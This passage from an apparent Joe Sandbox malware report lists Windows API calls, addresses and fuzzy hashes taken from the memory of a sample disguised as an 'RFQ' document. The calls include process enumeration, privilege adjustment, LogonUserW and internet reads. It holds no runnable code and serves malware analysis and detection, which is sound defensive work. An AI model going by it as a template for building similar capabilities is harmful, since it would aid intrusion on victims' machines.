                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 2574300362-192647395
                                                                                • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                                • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                • String ID:
                                                                                • API String ID: 2576544623-0
                                                                                • Opcode ID: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                                • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                                                • Opcode Fuzzy Hash: 89fde9512b94cb07eafd2aa5ff05997a94c0a9f5672a7c8b2447530929707f10
                                                                                • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($|
                                                                                • API String ID: 1659193697-1631851259
                                                                                • Opcode ID: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
                                                                                • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                                                • Opcode Fuzzy Hash: e4b6563495775eced85f6639daf36049b9172e9dced26037dbca7602620842ae
                                                                                • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                                                APIs
                                                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                • String ID:
                                                                                • API String ID: 599397726-0
                                                                                • Opcode ID: c748683f7969d9ff2733bc686b9ffa3dceda9ccf9dbca2d15652f0b20a90f335
                                                                                • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                                                • Opcode Fuzzy Hash: c748683f7969d9ff2733bc686b9ffa3dceda9ccf9dbca2d15652f0b20a90f335
                                                                                • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1682464887-0
                                                                                • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                                                • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                                                • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                                                APIs
                                                                                  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                • GetLastError.KERNEL32 ref: 00458865
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1922334811-0
                                                                                • Opcode ID: 5b4b1d7d67927872bd2662a97e5438a507af917e4c63a758eda2fff7e1a615f8
                                                                                • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                                                • Opcode Fuzzy Hash: 5b4b1d7d67927872bd2662a97e5438a507af917e4c63a758eda2fff7e1a615f8
                                                                                • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                • String ID:
                                                                                • API String ID: 3429775523-0
                                                                                • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                                • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                                                APIs
                                                                                • __time64.LIBCMT ref: 0046889B
                                                                                  • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                  • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                • String ID: 0eL
                                                                                • API String ID: 2893107130-3167399643
                                                                                • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                                • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                                • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                                • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                                • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                                • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                                • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                                • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: eb7ac69ade783395277c4643d4176b5893d02204cea2e8a5f246f56db08c2cc2
                                                                                • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                                • Opcode Fuzzy Hash: eb7ac69ade783395277c4643d4176b5893d02204cea2e8a5f246f56db08c2cc2
                                                                                • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                                • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                                • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                                • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                                • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                                APIs
                                                                                • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                                • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                                APIs
                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: LogonUser
                                                                                • String ID:
                                                                                • API String ID: 1244722697-0
                                                                                • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                                • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
